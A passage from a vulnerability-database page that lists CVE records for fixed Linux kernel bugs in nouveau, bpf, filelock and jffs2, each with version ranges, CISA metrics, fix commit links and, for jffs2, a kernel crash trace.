"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "3.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/nouveau: prime: fix refcount underflow\n\nCalling nouveau_bo_ref() on a nouveau_bo without initializing it (and\nhence the backing ttm_bo) leads to a refcount underflow.\n\nInstead of calling nouveau_bo_ref() in the unwind path of\ndrm_gem_object_init(), clean things up manually.\n\n(cherry picked from commit 1b93f3e89d03cfc576636e195466a0d728ad8de5)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:03.205Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3bcb8bba72ce89667fa863054956267c450c47ef"
},
{
"url": "https://git.kernel.org/stable/c/906372e753c5027a1dc88743843b6aa2ad1aaecf"
},
{
"url": "https://git.kernel.org/stable/c/16998763c62bb465ebc409d0373b9cdcef1a61a6"
},
{
"url": "https://git.kernel.org/stable/c/ebebba4d357b6c67f96776a48ddbaf0060fa4c10"
},
{
"url": "https://git.kernel.org/stable/c/f23cd66933fe76b84d8e282e5606b4d99068c320"
},
{
"url": "https://git.kernel.org/stable/c/2a1b327d57a8ac080977633a18999f032d7e9e3f"
},
{
"url": "https://git.kernel.org/stable/c/a9bf3efc33f1fbf88787a277f7349459283c9b95"
}
],
"title": "drm/nouveau: prime: fix refcount underflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43867",
"datePublished": "2024-08-20T23:50:50.429Z",
"dateReserved": "2024-08-17T09:11:59.280Z",
"dateUpdated": "2025-05-04T09:28:03.205Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42281 (GCVE-0-2024-42281)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix a segment issue when downgrading gso_size
Linearize the skb when downgrading gso_size because it may trigger a
BUG_ON() later when the skb is segmented as described in [1,2].
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2be7e212d5419a400d051c84ca9fdd083e5aacac Version: 2be7e212d5419a400d051c84ca9fdd083e5aacac Version: 2be7e212d5419a400d051c84ca9fdd083e5aacac Version: 2be7e212d5419a400d051c84ca9fdd083e5aacac Version: 2be7e212d5419a400d051c84ca9fdd083e5aacac Version: 2be7e212d5419a400d051c84ca9fdd083e5aacac Version: 2be7e212d5419a400d051c84ca9fdd083e5aacac |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42281",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:36.471436Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:30.904Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/filter.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a689f5eb13a90f892a088865478b3cd39f53d5dc",
"status": "affected",
"version": "2be7e212d5419a400d051c84ca9fdd083e5aacac",
"versionType": "git"
},
{
"lessThan": "dda518dea60d556a2d171c0122ca7d9fdb7d473a",
"status": "affected",
"version": "2be7e212d5419a400d051c84ca9fdd083e5aacac",
"versionType": "git"
},
{
"lessThan": "f6bb8c90cab97a3e03f8d30e3069efe6a742e0be",
"status": "affected",
"version": "2be7e212d5419a400d051c84ca9fdd083e5aacac",
"versionType": "git"
},
{
"lessThan": "11ec79f5c7f74261874744039bc1551023edd6b2",
"status": "affected",
"version": "2be7e212d5419a400d051c84ca9fdd083e5aacac",
"versionType": "git"
},
{
"lessThan": "c3496314c53e7e82ddb544c825defc3e8c0e45cf",
"status": "affected",
"version": "2be7e212d5419a400d051c84ca9fdd083e5aacac",
"versionType": "git"
},
{
"lessThan": "ec4eea14d75f7b0491194dd413f540dd19b8c733",
"status": "affected",
"version": "2be7e212d5419a400d051c84ca9fdd083e5aacac",
"versionType": "git"
},
{
"lessThan": "fa5ef655615a01533035c6139248c5b33aa27028",
"status": "affected",
"version": "2be7e212d5419a400d051c84ca9fdd083e5aacac",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/filter.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.13"
},
{
"lessThan": "4.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix a segment issue when downgrading gso_size\n\nLinearize the skb when downgrading gso_size because it may trigger a\nBUG_ON() later when the skb is segmented as described in [1,2]."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:51.055Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a689f5eb13a90f892a088865478b3cd39f53d5dc"
},
{
"url": "https://git.kernel.org/stable/c/dda518dea60d556a2d171c0122ca7d9fdb7d473a"
},
{
"url": "https://git.kernel.org/stable/c/f6bb8c90cab97a3e03f8d30e3069efe6a742e0be"
},
{
"url": "https://git.kernel.org/stable/c/11ec79f5c7f74261874744039bc1551023edd6b2"
},
{
"url": "https://git.kernel.org/stable/c/c3496314c53e7e82ddb544c825defc3e8c0e45cf"
},
{
"url": "https://git.kernel.org/stable/c/ec4eea14d75f7b0491194dd413f540dd19b8c733"
},
{
"url": "https://git.kernel.org/stable/c/fa5ef655615a01533035c6139248c5b33aa27028"
}
],
"title": "bpf: Fix a segment issue when downgrading gso_size",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42281",
"datePublished": "2024-08-17T09:08:48.477Z",
"dateReserved": "2024-07-30T07:40:12.261Z",
"dateUpdated": "2025-05-04T09:25:51.055Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41020 (GCVE-0-2024-41020)
Vulnerability from cvelistv5
Published
2024-07-29 13:34
Modified
2025-05-04 09:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
filelock: Fix fcntl/close race recovery compat path
When I wrote commit 3cad1bc01041 ("filelock: Remove locks reliably when
fcntl/close race is detected"), I missed that there are two copies of the
code I was patching: The normal version, and the version for 64-bit offsets
on 32-bit kernels.
Thanks to Greg KH for stumbling over this while doing the stable
backport...
Apply exactly the same fix to the compat path for 32-bit kernels.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c293621bbf678a3d85e3ed721c3921c8a670610d Version: c293621bbf678a3d85e3ed721c3921c8a670610d Version: c293621bbf678a3d85e3ed721c3921c8a670610d Version: c293621bbf678a3d85e3ed721c3921c8a670610d Version: c293621bbf678a3d85e3ed721c3921c8a670610d Version: c293621bbf678a3d85e3ed721c3921c8a670610d Version: c293621bbf678a3d85e3ed721c3921c8a670610d Version: c293621bbf678a3d85e3ed721c3921c8a670610d Version: c293621bbf678a3d85e3ed721c3921c8a670610d |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:56.135Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a561145f3ae973ebf3e0aee41624e92a6c5cb38d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c43ad4ab41602201d34c66ac62130fe339d686f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/911cc83e56a2de5a40758766c6a70d6998248860"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/53e21cfa68a7d12de378b7116c75571f73e0dfa2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f4d0775c6e2f1340ca0725f0337de149aaa989ca"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/73ae349534ebc377328e7d21891e589626c6e82c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5b0af8e4c70e4b884bb94ff5f0cd49ecf1273c02"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed898f9ca3fa32c56c858b463ceb9d9936cc69c4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f8138f2ad2f745b9a1c696a05b749eabe44337ea"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41020",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:24:28.681942Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:05.238Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/locks.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a561145f3ae973ebf3e0aee41624e92a6c5cb38d",
"status": "affected",
"version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
"versionType": "git"
},
{
"lessThan": "4c43ad4ab41602201d34c66ac62130fe339d686f",
"status": "affected",
"version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
"versionType": "git"
},
{
"lessThan": "911cc83e56a2de5a40758766c6a70d6998248860",
"status": "affected",
"version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
"versionType": "git"
},
{
"lessThan": "53e21cfa68a7d12de378b7116c75571f73e0dfa2",
"status": "affected",
"version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
"versionType": "git"
},
{
"lessThan": "f4d0775c6e2f1340ca0725f0337de149aaa989ca",
"status": "affected",
"version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
"versionType": "git"
},
{
"lessThan": "73ae349534ebc377328e7d21891e589626c6e82c",
"status": "affected",
"version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
"versionType": "git"
},
{
"lessThan": "5b0af8e4c70e4b884bb94ff5f0cd49ecf1273c02",
"status": "affected",
"version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
"versionType": "git"
},
{
"lessThan": "ed898f9ca3fa32c56c858b463ceb9d9936cc69c4",
"status": "affected",
"version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
"versionType": "git"
},
{
"lessThan": "f8138f2ad2f745b9a1c696a05b749eabe44337ea",
"status": "affected",
"version": "c293621bbf678a3d85e3ed721c3921c8a670610d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/locks.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.13"
},
{
"lessThan": "2.6.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.319",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.281",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.223",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.102",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.43",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.319",
"versionStartIncluding": "2.6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.281",
"versionStartIncluding": "2.6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.223",
"versionStartIncluding": "2.6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.164",
"versionStartIncluding": "2.6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.102",
"versionStartIncluding": "2.6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.43",
"versionStartIncluding": "2.6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.12",
"versionStartIncluding": "2.6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.2",
"versionStartIncluding": "2.6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "2.6.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfilelock: Fix fcntl/close race recovery compat path\n\nWhen I wrote commit 3cad1bc01041 (\"filelock: Remove locks reliably when\nfcntl/close race is detected\"), I missed that there are two copies of the\ncode I was patching: The normal version, and the version for 64-bit offsets\non 32-bit kernels.\nThanks to Greg KH for stumbling over this while doing the stable\nbackport...\n\nApply exactly the same fix to the compat path for 32-bit kernels."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:20:15.493Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a561145f3ae973ebf3e0aee41624e92a6c5cb38d"
},
{
"url": "https://git.kernel.org/stable/c/4c43ad4ab41602201d34c66ac62130fe339d686f"
},
{
"url": "https://git.kernel.org/stable/c/911cc83e56a2de5a40758766c6a70d6998248860"
},
{
"url": "https://git.kernel.org/stable/c/53e21cfa68a7d12de378b7116c75571f73e0dfa2"
},
{
"url": "https://git.kernel.org/stable/c/f4d0775c6e2f1340ca0725f0337de149aaa989ca"
},
{
"url": "https://git.kernel.org/stable/c/73ae349534ebc377328e7d21891e589626c6e82c"
},
{
"url": "https://git.kernel.org/stable/c/5b0af8e4c70e4b884bb94ff5f0cd49ecf1273c02"
},
{
"url": "https://git.kernel.org/stable/c/ed898f9ca3fa32c56c858b463ceb9d9936cc69c4"
},
{
"url": "https://git.kernel.org/stable/c/f8138f2ad2f745b9a1c696a05b749eabe44337ea"
}
],
"title": "filelock: Fix fcntl/close race recovery compat path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41020",
"datePublished": "2024-07-29T13:34:21.617Z",
"dateReserved": "2024-07-12T12:17:45.613Z",
"dateUpdated": "2025-05-04T09:20:15.493Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42115 (GCVE-0-2024-42115)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
jffs2: Fix potential illegal address access in jffs2_free_inode
During the stress testing of the jffs2 file system,the following
abnormal printouts were found:
[ 2430.649000] Unable to handle kernel paging request at virtual address 0069696969696948
[ 2430.649622] Mem abort info:
[ 2430.649829] ESR = 0x96000004
[ 2430.650115] EC = 0x25: DABT (current EL), IL = 32 bits
[ 2430.650564] SET = 0, FnV = 0
[ 2430.650795] EA = 0, S1PTW = 0
[ 2430.651032] FSC = 0x04: level 0 translation fault
[ 2430.651446] Data abort info:
[ 2430.651683] ISV = 0, ISS = 0x00000004
[ 2430.652001] CM = 0, WnR = 0
[ 2430.652558] [0069696969696948] address between user and kernel address ranges
[ 2430.653265] Internal error: Oops: 96000004 [#1] PREEMPT SMP
[ 2430.654512] CPU: 2 PID: 20919 Comm: cat Not tainted 5.15.25-g512f31242bf6 #33
[ 2430.655008] Hardware name: linux,dummy-virt (DT)
[ 2430.655517] pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[ 2430.656142] pc : kfree+0x78/0x348
[ 2430.656630] lr : jffs2_free_inode+0x24/0x48
[ 2430.657051] sp : ffff800009eebd10
[ 2430.657355] x29: ffff800009eebd10 x28: 0000000000000001 x27: 0000000000000000
[ 2430.658327] x26: ffff000038f09d80 x25: 0080000000000000 x24: ffff800009d38000
[ 2430.658919] x23: 5a5a5a5a5a5a5a5a x22: ffff000038f09d80 x21: ffff8000084f0d14
[ 2430.659434] x20: ffff0000bf9a6ac0 x19: 0169696969696940 x18: 0000000000000000
[ 2430.659969] x17: ffff8000b6506000 x16: ffff800009eec000 x15: 0000000000004000
[ 2430.660637] x14: 0000000000000000 x13: 00000001000820a1 x12: 00000000000d1b19
[ 2430.661345] x11: 0004000800000000 x10: 0000000000000001 x9 : ffff8000084f0d14
[ 2430.662025] x8 : ffff0000bf9a6b40 x7 : ffff0000bf9a6b48 x6 : 0000000003470302
[ 2430.662695] x5 : ffff00002e41dcc0 x4 : ffff0000bf9aa3b0 x3 : 0000000003470342
[ 2430.663486] x2 : 0000000000000000 x1 : ffff8000084f0d14 x0 : fffffc0000000000
[ 2430.664217] Call trace:
[ 2430.664528] kfree+0x78/0x348
[ 2430.664855] jffs2_free_inode+0x24/0x48
[ 2430.665233] i_callback+0x24/0x50
[ 2430.665528] rcu_do_batch+0x1ac/0x448
[ 2430.665892] rcu_core+0x28c/0x3c8
[ 2430.666151] rcu_core_si+0x18/0x28
[ 2430.666473] __do_softirq+0x138/0x3cc
[ 2430.666781] irq_exit+0xf0/0x110
[ 2430.667065] handle_domain_irq+0x6c/0x98
[ 2430.667447] gic_handle_irq+0xac/0xe8
[ 2430.667739] call_on_irq_stack+0x28/0x54
The parameter passed to kfree was 5a5a5a5a, which corresponds to the target field of
the jffs_inode_info structure. It was found that all variables in the jffs_inode_info
structure were 5a5a5a5a, except for the first member sem. It is suspected that these
variables are not initialized because they were set to 5a5a5a5a during memory testing,
which is meant to detect uninitialized memory.The sem variable is initialized in the
function jffs2_i_init_once, while other members are initialized in
the function jffs2_init_inode_info.
The function jffs2_init_inode_info is called after iget_locked,
but in the iget_locked function, the destroy_inode process is triggered,
which releases the inode and consequently, the target member of the inode
is not initialized.In concurrent high pressure scenarios, iget_locked
may enter the destroy_inode branch as described in the code.
Since the destroy_inode functionality of jffs2 only releases the target,
the fix method is to set target to NULL in jffs2_i_init_once.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.552Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b6c8b3e31eb88c85094d848a0bd8b4bafe67e4d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b3246052e01e61a55bb3a15b76acb006759fe67"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d6d94287f6365282bbf41e9a5b5281985970789"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ca26334fc8a3711fed14db7f9eb1c621be4df65"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/751987a5d8ead0cc405fad96e83ebbaa51c82dbc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d0bbbf31462a400bef4df33e22de91864f475455"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/05fc1ef892f862c1197b11b288bc00f602d2df0c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af9a8730ddb6a4b2edd779ccc0aceb994d616830"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42115",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:17:16.786814Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:06.015Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jffs2/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b6c8b3e31eb88c85094d848a0bd8b4bafe67e4d8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0b3246052e01e61a55bb3a15b76acb006759fe67",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6d6d94287f6365282bbf41e9a5b5281985970789",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5ca26334fc8a3711fed14db7f9eb1c621be4df65",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "751987a5d8ead0cc405fad96e83ebbaa51c82dbc",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d0bbbf31462a400bef4df33e22de91864f475455",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "05fc1ef892f862c1197b11b288bc00f602d2df0c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "af9a8730ddb6a4b2edd779ccc0aceb994d616830",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jffs2/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"vulnerable": true
},
{
